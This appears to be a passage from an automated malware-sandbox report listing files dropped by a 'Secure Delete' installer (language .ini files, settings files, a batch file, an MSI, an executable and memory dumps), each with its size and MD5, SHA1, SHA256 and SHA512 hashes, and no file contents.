67caef81cd36414de21c6da9ee8dddff8de7f543

SHA256
fab8db28a3d3b192ed385bbc7e51e4939f694e99cf33fd8aa12f3c0f431baeb1

SHA512
a83e5fdf620ddc5973232c9c82a91a176c215e4315546f7b2bb679b9cc44a802c2373428b37e54059a3fedae400b09860cafe00d091789415ed8d39066f627d6

Download Submit
C:\Program Files (x86)\Secure Delete\Application\Languages\de.ini

Filesize
4KB

MD5
8faa5b93673b63a8e49cf1bc44e74847

SHA1
41d3986b4b0e55455bae3c9ed772a72ce8d70edd

SHA256
aee0de78527a323a58d2ac4085320c929615a31a016d50aa42103a71d5d58f86

SHA512
ad3ae87c11bb1c8d5745877f9b8b5311f8422cad36654e926decb78fd20b5f123ca1c97e233436ada5e3cdb6015c23e03d2fe3324a815dcead289ac06dc9685d

Download Submit
C:\Program Files (x86)\Secure Delete\Application\Languages\en.ini

Filesize
1KB

MD5
667c980f8cd8188a655d021694e2827b

SHA1
18ff11f478a31c28f3ca0391bb2c881591c473eb

SHA256
6ec7238938fc876381377aa8721305599756fc728843468132f2f42ad247593e

SHA512
794c476816fb5641d69538f7e802205989f6df4cae2be4c0e67cbc2771e56b488921cd510e775eb65166866e882126f3b69068383c89224e9e5a0ac8322c1dd1

Download Submit
C:\Program Files (x86)\Secure Delete\Application\Languages\es.ini

Filesize
3KB

MD5
427ecb20be96e8ad36285ab3f99868ea

SHA1
9658bfcff5ecae656f581f7fc425ef043aa8493a

SHA256
a2cd4991bfcf6c9d72e359a65ca6bb408ceca577676269bb0fd564a7e0991eee

SHA512
a8f3e05ae2afeddbdbee236bf4a88eb76c3b94f09331f9fc61dedc4f48775efa99399c4b8ab8cd4cc76b3da483d389b444716fde383f8e46f35321b0e4b17936

Download Submit
C:\Program Files (x86)\Secure Delete\Application\Languages\fr.ini

Filesize
4KB

MD5
02d2be951b75bd1d079f14087df679c9

SHA1
cc8b581c9156605cc492f2421e9e8475672af70a

SHA256
bcfef812de24932c9f401473a2ba720625cd5acb23ceecf35783271db1eb51cd

SHA512
bb3dd5009fcd9219db5c554eb36023c33281e6ab7756945bc083b08e7cb3de270475226a20cd95a07b045ceaa8f7abc58f19944f30386aac8e75d91324ee0c79

Download Submit
C:\Program Files (x86)\Secure Delete\Application\Languages\hu.ini

Filesize
3KB

MD5
b0875d04ae86c3c1027d96c45fa17677

SHA1
490eddd58d539e39fa0303bfcb8c58b605f3f5b0

SHA256
7cd29ed2eb1412c748fa91bf126dc1edab2107d28abfde1a00aae86bd67209fa

SHA512
6ea3236e6331fd8a9ab4342406c01ae8446eca60bea7d2f15f9c6f88746efb8628b92074eb3bc4c50a622a6786b7cd85f068a537df6f9aa366f457dc2cb7d188

Download Submit
C:\Program Files (x86)\Secure Delete\Application\Languages\it.ini

Filesize
3KB

MD5
747aa9090eb43a1b464ab98b57ab10e4

SHA1
d67ff1b4e2a48194c7f66cdec0610bf75c3c42c0

SHA256
7b8259b01e5a4dc853df01a2d4062c64ca61f27583db41bd827fafcf74284727

SHA512
47d4a0aa240758be5864b03c27859d17037e1dfb7af99b494086ed248b82250165abedd7ad6a8a88f5503c77c61a72b4d7aef76b62a3a65ffeb1229a113dd071

Download Submit
C:\Program Files (x86)\Secure Delete\Application\Languages\pl.ini

Filesize
3KB

MD5
ffd2fa67986045e5b906e6e69d829842

SHA1
90e90d0e35eb4f4b926205b79a86def2ab189537

SHA256
6fdf181f4979735be4c23c0d9c7fdb2434be32e66ece83945cb258ef0386e99c

SHA512
bbb9d4cfecf9e748a4b85705f392bd96840a5a10b80c4a6959695ccb92076c8d39a756ed910fb69ea6d43f630907518ccab7626d20a54112e47172e2ab08296c

Download Submit
C:\Program Files (x86)\Secure Delete\Application\Languages\pt.ini

Filesize
3KB

MD5
e28e61fd9e47fbf444d913fccee788f2

SHA1
d8e67acfa196d635d7983d7d91e15fa1ca6b3a26

SHA256
66411dd0010b8edab646d53a42f40365509715ca0c173b04279133ccc84b9a9c

SHA512
72ca226e2fb8bda1c24133bf47d68d6ccee30ba56b42949efdbedab9e0ae28d48398b4ce0785a1ec641ff7fc41f40f37788fa032b9febe72229ce80a199d5fc1

Download Submit
C:\Program Files (x86)\Secure Delete\Application\Languages\ru.ini

Filesize
3KB

MD5
bd10e1d40a8abc119cc3f7ee6f8c30c5

SHA1
5ce745c976083eb5dedb08e2f7a42e2b18109a4a

SHA256
76fae17e487b163ca7cfce3e3e9a25aaf51c8e5addaabd4ce235717d3486e3b1

SHA512
c73fe1bfd77ad6207fa3ab7bb77c55f82e08caaceb6306050764384d9c27a216b349cde99e63fedf94d57cc7331bc392885cec69c70c515aafc158834a84ad6e

Download Submit
C:\Program Files (x86)\Secure Delete\Application\Languages\zh.ini

Filesize
1KB

MD5
34d15336f4acea86e935cdf01e2a3739

SHA1
99e8af92c43819ccf5e4cb6e28346b8a524deb31

SHA256
ce0ae4195b24c29341560922e0c7b33a1ac9218d72edde10e6733963e61f6b4a

SHA512
805b7acb92d0cedb4d854ad985512c7c79d0e3fb96dd7f92a86fdb28ebd9c5e2cac4736fb6f2ec7365d1f4f93d233c5cfb1fb1b20ee63fd3a925624d075bde6c

Download Submit
C:\Program Files (x86)\Secure Delete\Framework\Interface\colors.ini

Filesize
703B

MD5
109bca6c9ed654d5d684290fc909bed1

SHA1
fb6f36ff383cb4b5b718b307594afa02071c5897

SHA256
f11600d990ce9320da8997bec908cbfa649a44074db5a8f1c7f77a731f74fb60

SHA512
1b2c1a0b5178d9174df03f46b6db70b7f33500e100e616bd0a2942c48497695bbceb4bef90d24e3c53d281aae9bb01a9aea8eaa1ac00d8d8b9e6a79040a68366

Download Submit
C:\Program Files (x86)\Secure Delete\Framework\Languages\ar.ini

Filesize
9KB

MD5
45a616d3bea01c0f03b26eaa44c658c6

SHA1
a06e2fc5fbea47d48643b5bf0752ebb7f656c3a7

SHA256
065670a8045fdeaa953f14db157cb406cfa7d2fcbc210806e728d7f2ffa71bd8

SHA512
3aeae5852ccdfb804b9cf21da57b549276b5c34cff6889033fced54cf0aabcd973a8fde49eb89df4a110c5f1271464e3ee0d913b160eed70800d9954d4d2ead3

Download Submit
C:\Program Files (x86)\Secure Delete\Framework\Languages\cs.ini

Filesize
10KB

MD5
4a0dccfd59f71bd3831d776206e21fef

SHA1
f29435a647a1edaa91d5a3aa5b82d8c4f97eff4f

SHA256
9f4842373cd11795324a083c0b025caf82a8c74a43a5d844e387eb5bbd548509

SHA512
0e993ce84dccd76b3297b427e3b98e086c4a050d202194f653713da7e201f62978ca26785232d6b7299f857675cb573bb22fc35a80e01080fe879f8f9f0f65be

Download Submit
C:\Program Files (x86)\Secure Delete\Framework\Languages\de.ini

Filesize
12KB

MD5
88188d4e164f4bd7673cab8a40af4dd0

SHA1
ff5349165480f6ebbe3bd7dd6ee0f5aea669e7f4

SHA256
8c7e490d7346c1db36fff81752a9ba28f08e29de3008110d2a87ec5958af691f

SHA512
6ae4239e448dd3b3044202c5ec147aa38786a60543ec9d6663ac49aedb6e43302bd461ff8894c1fa5109383d9024961d4ae5f61e598a80ef28624b742b848cdd

Download Submit
C:\Program Files (x86)\Secure Delete\Framework\Languages\el.ini

Filesize
12KB

MD5
e3c5ce9434ecb5321e0d6795eb315e69

SHA1
bc927c12543c89c41201ee1fec91ab7910e7bcce

SHA256
94fc20a30f617c78046e994061addfba673edd4b9704222637ec407208969c66

SHA512
08fcfd5321720e66f14bf1a89e7b4c7f17387c80988541d8b6bde0e151ef27ecc4c2df3bcf2ce1d7c58f7e6622c23bee82694718fbab9debc572ca07118767f7

Download Submit
C:\Program Files (x86)\Secure Delete\Framework\Languages\en.ini

Filesize
10KB

MD5
61e2aed3a5e00b0a84a13da089bde1df

SHA1
9a500f5d43252e2a6698a2b19dfa72d4b7fabbb4

SHA256
4b49b8b6f1c984f896170fe86221b8c09693a51dd42a216351ae2a1acbb7d94f

SHA512
57457db24faa114865de2a17baa28c18d7c2fdc545fe8b55b2944b1ff1ec3913187415df66831fc5915e6bd5e8decaf9e467a822ca674b96a6307a13ebd683b2

Download Submit
C:\Program Files (x86)\Secure Delete\Framework\Languages\es.ini

Filesize
11KB

MD5
fc7d679eda2ecd72a3360365561465c9

SHA1
434e66cc4c940f241c7f78b13b18020513da4bfe

SHA256
f8a9e215f77c02e1499428629e5141fe5006d050ca883d8960d9b4a485c045e5

SHA512
145ef09b7613af8883f6b2e14f1e375c969d46f707b0c1614095048797ce2c91b2b647d22ad8bffa738ff1fc0559915fb5396e2ad6f2cbd81c90d54e670924a2

Download Submit
C:\Program Files (x86)\Secure Delete\Framework\Languages\fr.ini

Filesize
12KB

MD5
1cce17c99651856c68b2cdb05524fed1

SHA1
0d565e71e86cc83a2a2ddc7e3dacf894268730d9

SHA256
ee9d39139279d0709902b6c5c89ae7933237c18627e9af3adc3922c4ee9162e1

SHA512
039c21c320452c379f85d5f1c01b918025a9ba12a120a9bb4d097fb3bd7f8ecb8c8ec0a47e21569fb55728365f2ae42382994f3ad14015db1894c0b8543e1c56

Download Submit
C:\Program Files (x86)\Secure Delete\Framework\Languages\hu.ini

Filesize
10KB

MD5
48a93b98d74d923b0b2af88fe4d0b4b3

SHA1
eb9d8dab6bc16fd1f42fd63f3c14ca63013e3269

SHA256
54276c9ccbe30eed907a4a510ee4856cb95a1ca634985718b9598fabb2ce6d65

SHA512
e6db1d845507d3d0db50facc5d99db61ff46013cc8bd543b8b8f8403d25c5d9f91bc9c663f7397f6194f712fd5bd488eb80b0a8683d50b102d01603969b6c960

Download Submit
C:\Program Files (x86)\Secure Delete\Framework\Languages\it.ini

Filesize
11KB

MD5
28ca307fee46c35f35eee4e2e85b408e

SHA1
80c30f1a57e01f64960e4b7ed23a319b5663813d

SHA256
c14b496334bc4652d1858fc815a558d3f77236f3eee48254958fc5e48b60e6c9

SHA512
ca2b2e50d70a11cd807147161f55570ef0c85c34f598a9fa01f45f3411f1a85ee0676665f3e0cbbe46d863cc81c4c65deec816b4cab94631e80df6c5c6616e4f

Download Submit
C:\Program Files (x86)\Secure Delete\Framework\Languages\ko.ini

Filesize
5KB

MD5
c3c7900d515ad18c203ed1f9788bbd1d

SHA1
a25e4da62cbf63005c9b552d3a06b4db768d9a4c

SHA256
33d01f4f2acf21bafe80857492a52bdf953135e2c83277459795bd9818608ec9

SHA512
2d3b0be6c0118588a5483b50d9023ffee77ea817fef3e62af9e84ff77601ad465bc4e7da35a52012d2ab9c97a2057bd2222b5cf890c691b573c7e6d0983f5bb0

Download Submit
C:\Program Files (x86)\Secure Delete\Framework\Languages\nl.ini

Filesize
10KB

MD5
039d85835781eb2d65c1cf647ed7c8e8

SHA1
7f4cdc09761fc6b354d7f566fb9d5c2b497e31f1

SHA256
830e42a461519069dc40c6f3fa3ae382493aef06d62858bc056d9dcc1ebe2a75

SHA512
80878561ab8e04e75661bb9d0cde94b99a383131d3618e15bd0d07f544321db0c1181f8433f5f0c03af8cbc4b9671cb02763206fcdf744f33cd361459e546ff4

Download Submit
C:\Program Files (x86)\Secure Delete\Framework\Languages\pl.ini

Filesize
10KB

MD5
764b94eaf19e890c6c83185a055adaa7

SHA1
2a57361c51ea0bffafb7ebcf6fb90b22cbcfb4cb

SHA256
084b1aeb71b0cb2fb6cc5e1379a432b1a89ba55be92f117a950e8e590e05c8b0

SHA512
f5277a938aadc8cab54e344d038146050f83fdb1b6dcef67ecb2bdd23c59aabd879f9f5c37c21b91413d1b45d37ad3e1c427fb3648b4f62872b7e3045ffa5e77

Download Submit
C:\Program Files (x86)\Secure Delete\Framework\Languages\pt.ini

Filesize
10KB

MD5
9e0668b230f3dcc52c11b8d0ed2fb216

SHA1
b719175c40e72b388359427ae198df51c0caa83a

SHA256
893010e13904c96ae43b3e057467e378146f5b98466d0aad9ca04fb82640a8c2

SHA512
f97892586dc4ca088317ab4c22257bfdfc00f4ea2211268f9c88f6999115d2362aea70af539841fc4bad387280949fb419674900a71b59312b8b5f3c2b6e57f0

Download Submit
C:\Program Files (x86)\Secure Delete\Framework\Languages\ru.ini

Filesize
11KB

MD5
4b28cf5972728e6966e9edf02d00ecc1

SHA1
22d254f47d15c54751e125aa72245e5b475d9b0e

SHA256
5cad1998ea857a988d64bf065c86ce7907d70b09c836d45f504defa4cc35cf76

SHA512
7afd9f4001dc90fdbf800435822d2a03e51a9f60d5e8de5f70bb9fb55e6fce058ef8fc4ee4aa44f36f1a11df563b5f594ce896d885dd03e7e77f6058452d6696

Download Submit
C:\Program Files (x86)\Secure Delete\Framework\Languages\zh.ini

Filesize
3KB

MD5
b0f9d81dd747c71757ee09129d40f843

SHA1
190142aa31fe5cfabd9dddd2cd7fe2d31e86367d

SHA256
7f02e7838f7167e67a29aa35ef865d396e82fff6b5dc68f8ef2efa6dfa549900

SHA512
22ae7015711da16fbea1c469ba8817acf26ff890aeaea135e7e3bc55a27a61b0b785651ec3d0b51286fa40b99f785232cfc47484ec4a9f9aa515cd4884bd0a27

Download Submit
C:\ProgramData\WindowsHardwareTelemetry.ini

Filesize
2KB

MD5
438438bef4dbcc93e6f0652e4a4504d7

SHA1
b7a20474ec7633a46a7f3a7bdfc480ce3eeab9d6

SHA256
33d96a67f5a14a39c6b677f52754c4389c09476ffbd291b5715641cf87e8035d

SHA512
beecd0a59c4e47080d7c15fccfc88a86c50adac756d1284eb08ca2bf641c76ec0f52df7f3361245af4a6734e4ca20c2eae9069ea0ea4e5e589c55a460165b5d1

Download Submit
C:\Users\Admin\AppData\Roaming\sfdlt2021\Settings\MarketingPulse.ini

Filesize
109B

MD5
37327ff9bae934a4cefb5d08f6929107

SHA1
39d40dd1d8386900a83f50ef0bf62fd08428f13e

SHA256
3a13d506cc3a04e08d53ed37ca0994fa24f35c7f3ae7596ff37048908b159328

SHA512
b367bc4fd962e4698e082151b0bad671c39cb3cd67933244b0d24e8f163237bae59f6b01ce4f4ffb0cb41d6a90cbb198785e5ecc6e2f9b79990db14e1fe87808

Download Submit
C:\Users\Admin\AppData\Roaming\sfdlt2021\Settings\ServerResponse.ini

Filesize
216B

MD5
e3050e3582753bb40ae430e4fb26a037

SHA1
daddb7f2c7f8bce8881ada3af0b2658e109b76aa

SHA256
22404522ca59b62d208615677c1af367b64ff86117742961adf07718c92592d8

SHA512
69e902361d0371db0b92e34c70aa09d4bcbc5772b6f8d8e090b0cad84394fb60a2460db6b7822be7e8a02a36a6a465ee27aae06e11f729cc4cc9d0fb29b72d7e

Download Submit
C:\Users\Admin\AppData\Roaming\sfdlt2021\Settings\Settings.ini

Filesize
105B

MD5
aef3df3a25eaef4086c2208a3446991c

SHA1
a433a9fa884f176d753c81cacbe3c7c4e7ac9c31

SHA256
d298d118c4c3f55d7c9497e938a5967caaab3d45d7382358baf36e439a3639ea

SHA512
fcbc90c3227743007e1acb78d65fd46ee8051e107922a5e8caf81efffba341a11ebacb8d0fc464bfa987d7d034e536b52d8941afadfd5564fdf29a82c6d6aa0a

Download Submit
C:\Users\Admin\AppData\Roaming\sfdlt2021\Settings\UF.ini

Filesize
246B

MD5
8ef20e2a7cdc0d4edf9bc1fcb799eb5d

SHA1
be34cd52550b0571cf7dfab00136ebb9fcb86d66

SHA256
8d8c2b9d0b4d4999d8401fe41fabb3c8923f07deb9fc3c5143e49512bbb79c2a

SHA512
09ba293110a7dd4d692e27886e73cd5c0d48c8d0412aa5a56ed5f84a44b7d5557f88a5709c31fb78bd273b175f6a605c4985c618bf66dad4da575b21282e6ce8

Download Submit
C:\Users\Public\sd895CEfer.bat

Filesize
461B

MD5
1e5be820f6b9bc670610f3fc2e177f0a

SHA1
93787871068f8790436ccfe01f573255feecd236

SHA256
c80001e2600b7ae41c543db7010465d25d3198f7bb355a71e68ff2af7afa06a4

SHA512
1479ea2955c01073e76b06a597887379bcad2977ba04f8e537fae2e1de456e3099e0a67c242af940f597c7858d7172895740ab762f3ba8389534a7d377c16213

Download Submit
C:\Users\Public\setup.msi

Filesize
2.7MB

MD5
ca201e16a298301717fe75cd60472450

SHA1
2fd56fe59f7bb183b03b9fd6cfb8ebcfa4b22925

SHA256
2dba1e30b5f52499852b8eb011d12a34e77c34d2b51391ad96a2ebfb2dddec0e

SHA512
d1407cf0f9784856aa0f1e7123ac32995917f9be97dd7fa4e62a642165a7fe4a9c1a7c7da9a51847fbe103bf79ec0c1e1c10775dbd725267bf340568d5328d26

Download Submit
C:\Windows\Installer\{E65B48A9-CA11-4DE4-9E44-25AA56CA24CB}\SecureDelete1.exe

Filesize
24KB

MD5
8aba087cc7a20800dace62c7855eea52

SHA1
54ca71c8c91543400049581efd847020e4d15555

SHA256
dae734ec67c5c8da1809cb5b35165867f7d6bf00cc7c09f07acc327093b176e7

SHA512
8dfd579a841d0a6f8047c373bf1d2852e4a057d7a3caafdee04b9f712f39cab113c4a10ce766065ed70d84072205ca35cc3149a2699a000e0d658cc949a0a471

Download Submit
memory/2796-30-0x000000001B670000-0x000000001B952000-memory.dmp

Filesize
2.9MB

Download
memory/2796-31-0x00000000027F0000-0x00000000027F8000-memory.dmp

Filesize
32KB

Download